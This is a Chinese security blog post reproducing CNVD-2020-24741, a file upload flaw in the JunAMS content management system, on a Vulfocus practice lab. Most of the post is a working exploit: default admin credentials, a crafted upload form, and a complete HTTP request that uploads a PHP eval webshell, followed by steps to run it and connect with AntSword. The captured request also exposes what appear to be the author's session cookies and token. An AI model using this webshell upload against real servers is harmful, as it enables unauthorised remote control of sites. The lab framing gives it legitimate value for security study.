junams 文件上传 (CNVD-2020-24741)复现

最新推荐文章于 2024-07-29 09:25:08 发布
最新推荐文章于 2024-07-29 09:25:08 发布
阅读量3k 收藏 14
点赞数 5
分类专栏: 漏洞复现 文章标签: apache 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121403512
版权

所有文章,仅供安全研究与学习之用,后果自负!

junams 文件上传 (CNVD-2020-24741)

junams 文件上传 (CNVD-2020-24741)

0x01 漏洞描述

JunAMS是一款以ThinkPHP为框架的开源内容管理系统。 JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。 后台路径 /admin.php admin:admin

不用登录后台也可以利用

0x02 影响范围

JunAMS junAMS 1.2.1.20190403

0x03 漏洞复现

(1)访问靶场
在这里插入图片描述
(2)前台没有上传功能,进入后台

/admin.php
/admin.php/login/index.html
admin:admin

在这里插入图片描述
如果显示正在处理 没有反应 F5刷新一下 进入

(3)
发现在系统设置->版本管理->添加表单中,发现文件上传功能
在这里插入图片描述
(4) 利用方法

在上边的 html源代码中
添加一个表单上传功能
action=" "的url地址需要修改

<form enctype="multipart/form-data" action="http://vulfocus.fofa.so:59218//admin.php/common/add_images.html" method="post">  
<input type="file" name="file" size="50"><br>  
<input type="submit" value="Upload">  
</form>

添加好后 点击 浏览-》 开启抓包-》 点击-》upload

上传文件请求包poc
也可以修改 ip和端口直接上传

POST //admin.php/common/add_images.html HTTP/1.1
Host: vulfocus.fofa.so:9461
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------326774743432415414462475084350
Content-Length: 267
Origin: http://vulfocus.fofa.so:9461
Connection: close
Referer: http://vulfocus.fofa.so:9461/admin.php/edition/add.html
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1636957776,1637035618,1637078936,1637219652; Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1636704940,1636709021,1636825689,1637222671; _ga=GA1.2.744261971.1636781886; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1637221849; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM3MzA2MDA0LCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.4Gr7Mkd6jMvSpaNITDQoww0jUnSP1d59O34IpzyDpmI; PHPSESSID=7jrca24napuo1umgs5s58dfhvu; _gid=GA1.2.277758474.1637219810; ktqnjecmsdodbdata=empirecms; ktqnjeloginlic=empirecmslic; ktqnjloginadminstyleid=1; ktqnjlogintime=1637222551; ktqnjtruelogintime=1637222430; ktqnjloginuserid=1; ktqnjloginusername=admin; ktqnjloginrnd=5I62uWWbyxT9vB9Fi6FU; ktqnjloginlevel=1; ktqnjloginecmsckpass=35f1e6e02526a8193d735f89d9093f80; ktqnjloginecmsckfrnd=gkgk52G7rpQ6xWOHlfLWxgdFpG9; ktqnjloginecmsckfdef=N0VHyuu3ljnoPVbceYkXaX; ktqnjemecOYNqOjnu=BXWggMbbslguQiExvN; Hm_lpvt_b5514a35664fd4ac6a893a1e56956c97=1637222890; thinkphp_show_page_trace=0|0; eth0_time=1637226896; eth0_num=0; eth0=249.118; login_auto=YXs3g0Y%3D%7C0e2c7f3efd15db77ba3f2ec9ab35f8347cb5be0d
Upgrade-Insecure-Requests: 1

-----------------------------326774743432415414462475084350
Content-Disposition: form-data; name="file"; filename="webshell.php"
Content-Type: application/octet-stream

<?php eval($_REQUEST[1]); ?> 
-----------------------------326774743432415414462475084350--

在这里插入图片描述

根据响应包的地址访问 上传后的文件

http://vulfocus.fofa.so:59218/public//edit//20211118//408b1894206d126f735d0c65ad74da2c.php?1=phpinfo();

上传成功
在这里插入图片描述
蚁剑连接成功
在这里插入图片描述

0x04 漏洞修复

升级至最新版本

总结

整个上传流程为:获取图片文件后缀、Mime类型、内容,当后缀为图片文件时,检测内容是否为图片,当后缀不为图片文件时,定义上传目录与文件名,上传成功,返回文件路径。
并且common方法没有受后台权限验证基类Backend限制,任意用户可访问,产生前台任意文件上传漏洞。

详细 漏洞利用分析 可以参考

https://www.cnblogs.com/cHr1s/p/14263008.html
LuckyCharm~
关注
专栏目录
0x03 ShowDoc 文件上传漏洞(CNVD-2020-26585)复现
weixin_43263566的博客
08-22 1092
如果能成功访问就说明有可能存在漏洞,是否存在漏洞还需要后续进行上传测试。首先你可以编写个搜索fofa的脚本,用来收集目标ip。然后就可以编写ip验证脚本。
junams 文件上传 (CNVD-2020-24741)
小小猪的博客
12-30 2096
junams 文件上传 (CNVD-2020-24741) 漏洞简介: JunAMS是一款以ThinkPHP为框架的开源内容管理系统。 JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。 影响版本: JunAMS v1.2.1.20190403 环境搭建: 在线环境 地址 漏洞复现: 访问后台 账号admin密码admin 点击系统设置->版本设置->图片上传 burp进行抓包,可以看到有上传功能 分析common...
JunAMS文件上传(CNVD-2020-24741)
m0_65150886的博客
02-21 1091
JunAMS junAMS 1.2.1.20190403版本存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。2.访问http://ip:port/admin.php,进入后台登录页面。后台路径 /admin.php 账号密码 admin:admin。3.输入账号密码进行登录,若显示系统正在处理中,点击F5刷新页面。JunAMS是一款以ThinkPHP为框架的开源内容管理系统。1.访问http://ip:port,出现如下页面,开始实验。4.通过burp发送如下poload。
junams 文件上传CNVD-2020-24741
最新发布
qq_23003811的博客
07-29 217
JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。1、登录后台,输入账号密码点击登录,刷新页面可以进行入后台页面。3、上传一个shell.php抓包,提示上传失败,发送到重发器。JunAMS是一款以ThinkPHP为框架的开源内容管理系统。后台路径 /admin.php 账号密码admin/admin。5、使用蚁剑等工具进行连接上传的后的shell.php名称。4、修改请求上传的地址为。2、找到任意上传位置。
内部文件上传系统漏洞分析溯源
weixin_47493074的博客
09-16 463
首先根据服务器版本IIS6.0可以判断,利用IIS低版本的解析漏洞。2、IIS解析漏洞分为两种:(IIS6.0在解析asp格式的时候有两个解析漏洞,一个是如果目录名包含“.asp“字符串,那么这个目录下所有的文件都会按照asp去解析,另一个是只要文件名中含有".asp;实战:上传一个asp类型的一句话木马,一定要是asp类型的,然后burp抓包,在GuFolderPath下的upload为upload/*.asp,然后菜刀过去,脚本类型改asp,进入打开inetpub下wwwroot找到key。
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
PeiQi0#PeiQi-WIKI-Book#银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-624371
07-25
银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437漏洞描述银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感
CNVD-2020-10487-Tomcat-ajp-POC:CNVD-2020-10487(CVE-2020-1938),tomcat ajp文件读取长度poc
03-08
CNVD-2020-10487-Tomcat-Ajp-lfi-POC CNVD-2020-10487(CVE-2020-1938),tomcat ajp lfi poc注意:poc.py仅在python2.7上运行,不支持python 3+ 用法:pip install -r requirements.txt python poc.py -p 8009 -...
【漏洞复现-dcrCms-文件上传】vulfocus/dcrcms-cnvd_2020_27175
10-10 2260
文件上传】修改文件类型
2020-04-11
weixin_46988600的博客
04-11 122
用我最宝贵的三年去学黑客技术 # 不要怂╯▂╰ List itemwww .jie feng 6.com A </title > </head > ` ` $ 第一次写 ...
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1792
【seaCms-命令执行】后门代码写入可解析文件中
CMS-CVE
qq_49714982的博客
02-23 442
WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0。WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0。WSO2 身份服务器作为密钥管理器 5.3.0 及更高版本至 5.10.0。WSO2 API Manager 2.2.0 及更高版本到 4.0.0。影响范围:jQuery Upload File
2020-03-20
weixin_46611816的博客
03-20 102
进博客的第一天
Vulfocus靶场漏洞复现系列—1
tlovejr的博客
03-02 6033
文章目录 前言 一、pandas是什么? 二、使用步骤 总结 前言 接下来会给大家介绍一些最常见的复现漏洞过程,我所用的是Vulfocus靶场,靶场安装方法已经在上一篇文章讲过,大家可以自行去观看。如果大家想及时获取最新漏洞消息,大家可以直接cnvdhttps://www.cnvd.org.cn/去查看即可,小白入门,如果在博客中有什么错误,还请各位大佬指出。 一、Drupal远程代码执行漏(CVE-2019-6340) 1、漏洞介绍 Drupal官方之前更新了一个非常关键的安全补丁,
记一次内网靶场渗透WP
include_voidmain的博客
04-19 3155
0x01 前言 此次靶场渗透思路,攻击者通过VPS(kali-linux)服务器以WEB_1-(ubuntu,双网卡)为入口。 横向到一个WEB_2(windows 7,双网卡)通过双网卡进行横向探测,发现OS_3,利用目标存在的系统漏洞获取目标系统权限。 0x02 靶场拓扑 0x03 渗透过程 访问WEB_1服务器地址: http://192.168.28.135发现为JunAMS 扫描后台管理地址成功获取地址: http://192.168.28.135/admin.php并成功跳转至管理页面。 J
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
大雪封山的时候
02-22 9044
2020 年 1 月 6 日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的 Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)。攻击者利用该漏洞,可在未授权的情况下远程读取特定目录下的任意文件。目前,漏洞细节尚未公开,厂商已发布新版本完成漏洞修复。 一、漏洞情况分析 Tomcat 是 Apache 软件基...
CNVD-2020-10487(CVE-2020-1938)tomcat ajp 文件读取漏洞
热门推荐
Summer's blog
05-13 2万+
**# 漏洞简介    Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响范围 Apache Tomca...
CNVD-2020-24741
06-01
CNVD-24741是一项关于Apache Kylin的安全漏洞,该漏洞允许攻击者通过Kylin API的未经身份验证的访问,执行恶意代码或获取敏感信息。该漏洞影响了Apache Kylin 2.6.0之前的所有版本。 建议您及时升级到最新版本以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值